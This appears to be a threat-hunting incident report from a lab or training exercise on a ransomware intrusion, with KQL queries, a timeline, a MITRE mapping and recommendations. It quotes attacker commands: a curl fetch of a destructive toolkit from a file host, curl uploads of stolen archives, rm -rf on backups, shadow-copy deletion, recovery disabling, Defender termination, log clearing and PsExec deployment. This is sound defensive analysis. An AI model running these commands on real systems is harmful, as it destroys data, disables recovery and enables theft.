Rashwani/threat-hunting-Dead-in-the-Water

# Threat-hunting-Dead-in-the-Water ## Executive Summary **Incident ID:** INC2025-1125-003 **Incident Severity:** Severity 1 (Critical) **Incident Status:** Resolved ## Incident Overview Following a confirmed compromise of the administrative workstation `azuki-adminpc`, the unauthorized entity leveraged the account `yuki.tanaka` to perform lateral movement via SSH to the Linux backup server `azuki-backupsrv` using the `backup-admin` service account. On the backup server, the attacker conducted systematic reconnaissance of backup directories, user accounts, and scheduled jobs. A destructive toolkit (`destroy.7z`) was downloaded from the anonymous file-hosting service `litter.catbox.moe`, and all backup data was wiped using `rm -rf`. The cron service was stopped and permanently disabled to prevent backup restoration. The attacker then returned to the Windows environment, deploying the `silentlynx.exe` ransomware payload to three remote systems via `PsExec64.exe` over SMB admin shares using compromised domain credentials. Prior to encryption, all Windows recovery mechanisms were systematically eliminated — Volume Shadow Copy service stopped, backup engine halted, shadow copies deleted, shadow storage limited, Windows Recovery Environment disabled, and the backup catalog deleted. Security tools and file-locking applications were force-terminated to maximize encryption coverage. Persistence was established through a registry Run key and a scheduled task, both disguised as legitimate Windows security components. Anti-forensic techniques including USN journal deletion and event log clearing were employed to destroy evidence. The ransom note `SILENTLYNX_README.txt` was dropped on all encrypted systems. ## Key Findings - The compromised account `yuki.tanaka` initiated SSH lateral movement from `azuki-adminpc` (IP: `10.1.0.108`) to the backup server at `10.1.0.189` using the `backup-admin` service account. - On the Linux backup server, the attacker enumerated backup directories (`ls -la /backups/`), searched for backup archives (`find /backups -name *.tar.gz`), enumerated local accounts (`cat /etc/passwd`), reviewed scheduled jobs (`cat /etc/crontab`), and accessed stored credentials (`cat /backups/configs/all-credentials.txt`). - A destructive toolkit was downloaded via `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z`. - All 14 backup directories were destroyed with `rm -rf`, and the cron service was stopped (`systemctl stop cron`) and permanently disabled (`systemctl disable cron`). - `PsExec64.exe` was used to deploy `silentlynx.exe` to three remote systems (`10.1.0.102`, `10.1.0.188`, `10.1.0.204`) using credentials for `kenji.sato` and `fileadmin`. - Recovery inhibition included: `net stop VSS /y`, `net stop wbengine /y`, `vssadmin delete shadows /all /quiet`, `vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB`, `bcdedit /set {default} recoveryenabled No`, and `wbadmin delete catalog -quiet`. - Windows Defender processes (`MsMpEng.exe`, `MpCmdRun.exe`, `NisSrv.exe`) and file-locking applications (`sqlservr.exe`, `mysql.exe`, `oracle.exe`, `postgres.exe`, `mongodb.exe`, `outlook.exe`, `excel.exe`, `winword.exe`) were force-terminated via `taskkill /F /IM`. - Persistence was established via the registry value `WindowsSecurityHealth` under `CurrentVersion\Run` and a scheduled task at `Microsoft\Windows\Security\SecurityHealthService`. - The USN journal was deleted (`fsutil.exe usn deletejournal /D C:`) and event logs were cleared on both `azuki-adminpc` and `azuki-sl`. ## Immediate Actions The SOC and DFIR teams initiated incident response procedures upon detection. The compromised workstations and backup server were immediately isolated via network segmentation. The accounts `yuki.tanaka`, `backup-admin`, `kenji.sato`, and `fileadmin` were disabled in Active Directory. Firewall rules were updated to block all communications with `litter.catbox.moe` and associated IPs. All available event logs were preserved and collected by the existing SIEM for forensic analysis. The malicious scheduled task and registry persistence entries were removed from affected systems. ## Technical Analysis ### Affected Systems & Data **Devices** | Asset | Type | Role in Attack | |-------|------|----------------| | `azuki-adminpc` | Windows Workstation | Primary staging point, SSH pivot, PsExec deployment origin | | `azuki-backupsrv` | Linux Server | Backup server — all backups destroyed | | `azuki-sl` | Windows Server | Ransomware deployed via PsExec | | `10.1.0.102` | Windows System | Ransomware deployed via PsExec | | `10.1.0.188` | Windows System | Ransomware deployed via PsExec | | `10.1.0.204` | Windows System | Ransomware deployed via PsExec | **Accounts** | Account | Usage | |---------|-------| | `yuki.tanaka` | Compromised domain account — initiated SSH lateral movement | | `backup-admin` | Linux service account — used for SSH access to backup server | | `kenji.sato` | Domain account — used for PsExec ransomware deployment | | `fileadmin` | Domain account — used for PsExec ransomware deployment | ## Evidence Sources & Analysis ### Lateral Movement #### Remote Access — SSH Querying DeviceProcessEvents for SSH-related process executions on Azuki devices revealed the compromised account `yuki.tanaka` on `azuki-adminpc` initiating an SSH connection to the backup server at `10.1.0.189` using the `backup-admin` account. The parent process was `powershell.exe`, indicating a hands-on-keyboard session. DeviceProcessEvents | where DeviceName has "azuki" | where ProcessCommandLine has "ssh" | project TimeGenerated, DeviceName, AccountDomain, ProcessCommandLine, InitiatingProcessCommandLine | order by TimeGenerated desc A second query including the AccountName column confirmed the identity of the user executing the SSH command as `yuki.tanaka`, and the target account on the backup server as `backup-admin`. DeviceProcessEvents | where DeviceName has "azuki" | where ProcessCommandLine has "ssh" | project TimeGenerated, AccountName, DeviceName, AccountDomain, ProcessCommandLine, InitiatingProcessCommandLine | order by TimeGenerated desc #### Attack Source — Source IP Querying DeviceNetworkEvents on `azuki-adminpc` filtered for SSH-related initiating process command lines revealed the source IP address of the lateral movement. DeviceNetworkEvents | where DeviceName == "azuki-adminpc" | where InitiatingProcessCommandLine has_any ("ssh") | project TimeGenerated, DeviceName, InitiatingProcessCommandLine, LocalIP The SSH connection originated from local IP `10.1.0.108`, confirming `azuki-adminpc` as the attack source. ### Discovery #### Directory Enumeration & Backup Archive Search Querying DeviceProcessEvents filtered for `find` commands targeting `.tar.gz` files revealed the attacker searching for backup archives on the backup server. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has "*.tar.gz" | where FileName == "find" | project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName At `11/24/2025, 2:16:06 PM`, the command `find /backups -name *.tar.gz` was executed from an interactive bash session (`-bash`), confirming hands-on-keyboard reconnaissance. Later at `5:47 AM` on Nov 25, the same `find` command was used as part of the destructive phase with `-exec rm -f {}` appended to delete found files. #### Account Enumeration & Scheduled Job Reconnaissance Querying DeviceProcessEvents for commands containing `cat`, `pass`, `less`, or `grep` revealed the attacker enumerating local accounts and reviewing scheduled backup jobs. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has_any ("cat", "pass", "less", "grep") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `2:16:08 PM` on Nov 24, `cat /etc/passwd` was executed to enumerate all local user accounts, with the output piped through `grep --color=auto -v nologin` and `grep --color=auto -v false` to filter out service accounts and isolate interactive login accounts. At the same timestamp, `cat /etc/crontab` revealed all scheduled backup jobs. A focused query for crontab specifically confirmed both `crontab -l` and `cat /etc/crontab` were executed: DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has ("crontab") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine ### Credential Access #### Stored Credentials Querying DeviceProcessEvents for commands referencing `shadow`, `passwd`, or `cat` revealed the attacker accessing a plaintext credentials file stored in the backup directory structure. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has_any ("shadow", "passwd", "cat") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `2:14:14 PM` on Nov 24, `cat /backups/configs/all-credentials.txt` was executed, reading a plaintext file containing stored credentials from the backup configuration directory. This file likely contained service account passwords, API keys, and other sensitive authentication material. The attacker also read `cat /backups/config-backups/network-config.txt` at `2:14:14 PM`. ### Command and Control — Tool Transfer Querying DeviceProcessEvents for `curl` and `wget` commands across Azuki devices revealed the attacker downloading a destructive toolkit from an external anonymous file-hosting service. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has_any ("curl", "wget") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `5:45:34 AM` on the backup server, `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z` was executed, downloading a compressed archive named `destroy.7z` from the anonymous file-hosting platform `litter.catbox.moe`. The `-L` flag follows HTTP redirects, and `-o` saves the file locally with the specified name. This query also revealed exfiltration activity from `azuki-adminpc` via `curl.exe -X POST` commands uploading archived data (`banking-records.tar.gz`, `tax-documents.tar.gz`, `contracts-data.tar.gz`, `chrome-credentials.tar.gz`, `chrome-session-theft.tar.gz`) to `store1.gofile.io`. ### Impact — Data Destruction Querying DeviceProcessEvents for destructive commands (`rm`, `shred`, `dd`) revealed the attacker wiping all backup data from the backup server. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where ProcessCommandLine has_any ("rm", "shred", "dd") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `5:47:02 AM`, a single `rm -rf` command destroyed all 14 backup directories: rm -rf /backups/archives /backups/azuki-adminpc /backups/azuki-fileserver /backups/azuki-logisticspc /backups/config-backups /backups/configs /backups/daily /backups/database-backups /backups/databases /backups/fileserver /backups/logs /backups/monthly /backups/weekly /backups/workstations Additional `rm -rf` commands targeted `database-backups/*` and `config-backups/*` individually. A `find` command with `-exec rm -f {}` was also used to locate and delete remaining `.tar.gz`, `.tar`, `.zip`, and `.bak` files across the entire filesystem. ### Impact — Backup Service Stopped & Disabled #### Service Stop Querying DeviceProcessEvents on `azuki-backupsrv` for commands containing `stop` or `kill` revealed the attacker halting the cron scheduler. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki-backupsrv" | where ProcessCommandLine has_any ("stop", "kill") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `5:47:03 AM`, `systemctl stop cron` was executed to immediately halt the cron scheduler. This stopped all scheduled backup jobs from running. #### Service Permanently Disabled Querying for `disable` commands confirmed the attacker also prevented cron from starting on reboot. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName has "azuki-backupsrv" | where ProcessCommandLine has_any ("disable") | order by TimeGenerated desc | project TimeGenerated, DeviceName, ProcessCommandLine At `5:47:03 AM`, `systemctl disable cron` was executed. The results show the systemd SysV install scripts processing the disable command, confirming cron was permanently removed from the boot sequence. ### Lateral Movement — Remote Execution via PsExec Querying DeviceProcessEvents on `azuki-adminpc` for PsExec-related activity revealed the attacker deploying the ransomware payload to multiple remote systems. DeviceProcessEvents | where DeviceName == "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine contains "psexec" or InitiatingProcessCommandLine contains "psexec" or FileName contains "psexec" | project TimeGenerated, FileName, DeviceName, ProcessCommandLine Four PsExec executions were observed: | Timestamp | Command | Target | |-----------|---------|--------| | 5:58:35 AM | `"PsExec64.exe" /accepteula` | EULA acceptance (first run) | | 6:03:47 AM | `"PsExec64.exe" \\10.1.0.102 -u kenji.sato -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.102 | | 6:04:40 AM | `"PsExec64.exe" \\10.1.0.188 -u fileadmin -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.188 | | 6:05:46 AM | `"PsExec64.exe" \\10.1.0.204 -u kenji.sato -p ********* -c -f C:\Windows\Temp\cache\silentlynx.exe` | 10.1.0.204 | The `-c` flag copies the executable to the remote system, and `-f` forces overwrite if it already exists. A second query filtered for `FileName endswith "PsExec64.exe"` confirmed the same results and highlighted the payload name `silentlynx.exe`: DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where FileName endswith "PsExec64.exe" | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine A broader deployment query also revealed Robocopy.exe staging financial documents prior to exfiltration: DeviceProcessEvents | where DeviceName has "azuki" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("copy", "xcopy", "robocopy", "ADMIN$", "C$", "\\\\") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine ### Recovery Inhibition #### Shadow Copy Service & Backup Engine Stopped Querying DeviceProcessEvents on `azuki-adminpc` for service stop commands revealed systematic disabling of all Windows backup and recovery services. DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("stop", "kill", "vss") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine A focused query for `wbengine` confirmed the backup engine was also stopped: DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("stop", "kill", "wbengine") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine Services stopped in rapid succession at 6:04 AM: | Timestamp | Command | Purpose | |-----------|---------|---------| | 6:04:53 AM | `"net" stop VSS /y` | Stop Volume Shadow Copy Service | | 6:04:54 AM | `"net" stop wbengine /y` | Stop Windows Backup Engine | | 6:04:54 AM | `"net" stop SDRSVC /y` | Stop System Restore Service | | 6:04:55 AM | `"net" stop WinDefend /y` | Stop Windows Defender | | 6:04:55 AM | `"net" stop wscsvc /y` | Stop Windows Security Center | #### Process Termination — Unlock Files Querying for `taskkill`, `kill`, and `pkill` commands revealed the attacker force-terminating security tools and file-locking applications. DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("taskkill", "kill ", "pkill") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine Security tools killed at 5:31 AM: - `"taskkill.exe" /F /IM MsMpEng.exe` — Windows Defender Antimalware Engine - `"taskkill.exe" /F /IM MpCmdRun.exe` — Defender Command-Line Tool - `"taskkill.exe" /F /IM NisSrv.exe` — Defender Network Inspection Service File-locking processes killed at 6:04 AM (within 2 seconds — indicating automated execution): - `"taskkill" /F /IM sqlservr.exe` — Microsoft SQL Server - `"taskkill" /F /IM mysql.exe` — MySQL - `"taskkill" /F /IM oracle.exe` — Oracle Database - `"taskkill" /F /IM postgres.exe` — PostgreSQL - `"taskkill" /F /IM mongodb.exe` — MongoDB - `"taskkill" /F /IM outlook.exe` — Microsoft Outlook - `"taskkill" /F /IM excel.exe` — Microsoft Excel - `"taskkill" /F /IM winword.exe` — Microsoft Word #### Recovery Point Deletion Querying for `delete` and `shadow` commands revealed the attacker deleting all existing shadow copies. DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("delete", "shadow") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine At `5:58:55 AM`, `"vssadmin.exe" delete shadows /all /quiet` was executed, deleting all Volume Shadow Copies. This was executed again at `6:04:59 AM`. The same query also revealed `"wbadmin" delete catalog -quiet` at `6:04:59 AM`, deleting the Windows backup catalog. #### Storage Limitation Querying for `vssadmin` and `shadowstorage` commands revealed the attacker limiting shadow copy storage to prevent new recovery points. DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("vssadmin ", "shadowstorage ") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine At `5:59:56 AM`, `"vssadmin.exe" resize shadowstorage /for=C: /on=C: /maxsize=401MB` was executed, reducing shadow copy storage to 401MB — effectively preventing any new recovery points from being created. #### System Recovery Disabled Querying for `reagentc` and `bcdedit` commands confirmed the attacker disabled the Windows Recovery Environment. DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("reagentc", "bcdedit") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine At `6:04:59 AM`, `"bcdedit" /set {default} recoveryenabled No` was executed, disabling the Windows Recovery Environment at the boot configuration level. #### Backup Catalog Deletion The same deletion query also revealed the backup catalog being wiped: DeviceProcessEvents | where DeviceName has "azuki-adminpc" | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("rm", "delete") | order by TimeGenerated desc | project TimeGenerated, FileName, DeviceName, ProcessCommandLine At `6:04:59 AM`, `"wbadmin" delete catalog -quiet` was executed, deleting the Windows backup catalog which tracks all available restore points and backup versions. ### Persistence #### Registry Run Key Querying DeviceRegistryEvents on `azuki-adminpc` for `RegistryValueSet` actions targeting the `CurrentVersion\Run` key revealed the attacker establishing persistence via a registry autorun entry. DeviceRegistryEvents | where TimeGenerated between (datetime(2025-11-24) .. datetime(2025-11-26)) | where DeviceName == "azuki-adminpc" | where ActionType == "RegistryValueSet" | where RegistryKey has @"CurrentVersion\Run" | project Timestamp, RegistryKey, RegistryValueName, RegistryValueData At `6:05:01 AM`, a registry value named `WindowsSecurityHealth` was set under `HKEY_CURRENT_USER\S-1-5-21-...\Software\Microsoft\Windows\CurrentVersion\Run`. This ensures the ransomware payload executes automatically on every user logon. A second entry `SystemHealthMonitor` was also observed at `5:36:33 AM`. Both names mimic legitimate Windows security components to avoid detection. #### Scheduled Task Querying DeviceProcessEvents for `schtasks` in the InitiatingProcessCommandLine revealed the attacker creating scheduled tasks on multiple systems. DeviceProcessEvents | where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26)) | where DeviceName has "azuki" | where InitiatingProcessCommandLine has "schtasks" | project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine At `6:05:01 AM` on `azuki-adminpc` and `6:07:10 AM` on `azuki-sl`, the following scheduled task was created: "schtasks" /create /tn "Microsoft\Windows\Security\SecurityHealthService" /tr "C:\Windows\Temp\cache\silentlynx.exe" /sc onlogon /rl highest /f The task path `Microsoft\Windows\Security\SecurityHealthService` mimics the legitimate Windows Security Health service. The `/sc onlogon` trigger ensures execution at every user logon, and `/rl highest` runs it with the highest available privileges. ### Defense Evasion — Anti-Forensics #### Journal Deletion & Log Clearing Querying DeviceProcessEvents for `fsutil`, `usn`, `deletejournal`, and `wevtutil` commands revealed the attacker destroying forensic evidence on multiple systems. DeviceProcessEvents | where DeviceName has "azuki" | where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26)) | where ProcessCommandLine has_any ("fsutil", "usn", "deletejournal", "wevtutil") | project TimeGenerated, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine On `azuki-adminpc` at `6:10 AM` (initiated by `powershell.exe`): - `"fsutil.exe" usn deletejournal /D C:` — Deleted the NTFS USN journal, which records every file creation, deletion, and modification on the volume. - `"wevtutil.exe" cl Security` — Cleared the Windows Security event log. - `"wevtutil.exe" cl System` — Cleared the Windows System event log. On `azuki-sl` at `6:07 AM` (initiated by `silentlynx.exe`): - `"wevtutil" cl "Security"` — Cleared Security log. - `"wevtutil" cl "System"` — Cleared System log. - `"wevtutil" cl "Application"` — Cleared Application log. - `"wevtutil" cl "Microsoft-Windows-PowerShell/Operational"` — Cleared PowerShell operational log. Notably, on `azuki-sl` the InitiatingProcessCommandLine was `silentlynx.exe`, confirming the ransomware payload itself contains built-in anti-forensic capabilities. ### Impact — Ransomware Execution #### Ransom Note Querying DeviceFileEvents for `.txt` files created on Azuki devices confirmed the ransomware successfully encrypted files and dropped ransom notes. DeviceFileEvents | where DeviceName has "azuki" | where TimeGenerated between (datetime(2025-11-25) .. datetime(2025-11-26)) | where ActionType == "FileCreated" | where FileName endswith ".txt" | project TimeGenerated, DeviceName, FileName At `6:05:01 AM`, `SILENTLYNX_README.txt` was created on `azuki-adminpc`. At `6:07:09 AM`, the same ransom note was created on `azuki-sl`. Multiple instances on each device indicate the note was dropped in every directory containing encrypted files. ## Attack Timeline | Time (UTC) | Action | |------------|--------| | Nov 24, 2:10 PM | Initial reconnaissance on backup server begins | | Nov 24, 2:14 PM | `cat /backups/configs/all-credentials.txt` — Credential theft | | Nov 24, 2:16 PM | `cat /etc/passwd` — Account enumeration | | Nov 24, 2:16 PM | `cat /etc/crontab` — Scheduled job reconnaissance | | Nov 25, 5:31 AM | Windows Defender processes killed (`taskkill /F /IM MsMpEng.exe`) | | Nov 25, 5:39 AM | `"ssh.exe" backup-admin@10.1.0.189` — SSH lateral movement | | Nov 25, 5:45 AM | `curl -L -o destroy.7z` — Destructive toolkit downloaded | | Nov 25, 5:47 AM | `rm -rf /backups/*` — All backup data destroyed | | Nov 25, 5:47 AM | `systemctl stop cron` / `systemctl disable cron` | | Nov 25, 5:58 AM | `PsExec64.exe /accepteula` — PsExec first run | | Nov 25, 5:58 AM | `vssadmin.exe delete shadows /all /quiet` — First shadow deletion | | Nov 25, 5:59 AM | `vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB` | | Nov 25, 5:59 AM | `bcdedit /set {default} recoveryenabled No` | | Nov 25, 6:03 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.102` | | Nov 25, 6:04 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.188` | | Nov 25, 6:04 AM | `net stop VSS /y`, `net stop wbengine /y` — Services stopped | | Nov 25, 6:04 AM | All file-locking processes killed (`taskkill /F /IM sqlservr.exe`, etc.) | | Nov 25, 6:04 AM | `vssadmin delete shadows /all /quiet` — Second shadow deletion | | Nov 25, 6:04 AM | `wbadmin delete catalog -quiet` — Backup catalog deleted | | Nov 25, 6:05 AM | PsExec → `silentlynx.exe` deployed to `10.1.0.204` | | Nov 25, 6:05 AM | Registry persistence (`WindowsSecurityHealth`) + Scheduled task created | | Nov 25, 6:05 AM | `SILENTLYNX_README.txt` dropped on `azuki-adminpc` | | Nov 25, 6:07 AM | `SILENTLYNX_README.txt` dropped on `azuki-sl` | | Nov 25, 6:07 AM | Event logs cleared on `azuki-sl` by `silentlynx.exe` | | Nov 25, 6:10 AM | USN journal deleted + event logs cleared on `azuki-adminpc` | ## MITRE ATT&CK Mapping | Tactic | Technique ID | Technique Name | Evidence | |--------|-------------|----------------|----------| | Lateral Movement | T1021.004 | Remote Services: SSH | `"ssh.exe" backup-admin@10.1.0.189` | | Lateral Movement | T1021.002 | SMB/Windows Admin Shares | `PsExec64.exe` deployment to 3 systems | | Valid Accounts | T1078.002 | Domain Accounts | `backup-admin`, `kenji.sato`, `fileadmin` | | Discovery | T1083 | File and Directory Discovery | `ls -la /backups/`, `find /backups -name *.tar.gz`, `cat /etc/crontab` | | Discovery | T1087.001 | Account Discovery: Local | `cat /etc/passwd` | | Credential Access | T1552.001 | Unsecured Credentials: Files | `cat /backups/configs/all-credentials.txt` | | Command and Control | T1105 | Ingress Tool Transfer | `curl -L -o destroy.7z` from catbox.moe | | Execution | T1204.002 | Malicious File | `silentlynx.exe` deployed via PsExec | | Impact | T1485 | Data Destruction | `rm -rf /backups/*` — all backup data destroyed | | Impact | T1486 | Data Encrypted for Impact | `SILENTLYNX_README.txt` ransom note | | Impact | T1489 | Service Stop | `systemctl stop/disable cron`, `net stop VSS/wbengine` | | Impact | T1490 | Inhibit System Recovery | Shadow deletion, storage resize, bcdedit, wbadmin | | Defense Evasion | T1562.001 | Impair Defenses | `taskkill /F /IM MsMpEng.exe` | | Defense Evasion | T1070.004 | Indicator Removal: File Deletion | `fsutil.exe usn deletejournal /D C:` | | Persistence | T1547.001 | Registry Run Keys | `WindowsSecurityHealth` under `CurrentVersion\Run` | | Persistence | T1053.005 | Scheduled Task | `Microsoft\Windows\Security\SecurityHealthService` | ## Recommendations 1. **Network Segmentation** — Isolate backup infrastructure on a separate VLAN with strict firewall rules. SSH access to backup servers should be restricted to jump hosts with MFA enforcement. 2. **Immutable Backups** — Implement immutable/air-gapped backups that cannot be modified or deleted even with administrative credentials. Consider WORM (Write Once Read Many) storage solutions. 3. **Credential Management** — Never store plaintext credentials in backup directories. Rotate all credentials exposed in `all-credentials.txt` immediately. Implement a privileged access management (PAM) solution. 4. **Endpoint Detection Rules** — Deploy EDR rules to detect PsExec usage, mass `taskkill` commands, `vssadmin` shadow deletion, `bcdedit` recovery modification, and `fsutil` journal deletion. 5. **Service Account Hardening** — The `backup-admin` account should use key-based SSH authentication only. Disable password-based SSH authentication on all servers. 6. **Monitoring & Alerting** — Create alerts for `systemctl disable` on critical services, bulk file deletion in backup directories, registry modifications to `CurrentVersion\Run`, and scheduled task creation mimicking Windows system paths. 7. **Centralized Log Forwarding** — Forward all logs to an external SIEM in real-time so that `wevtutil cl` and USN journal deletion cannot destroy evidence retroactively.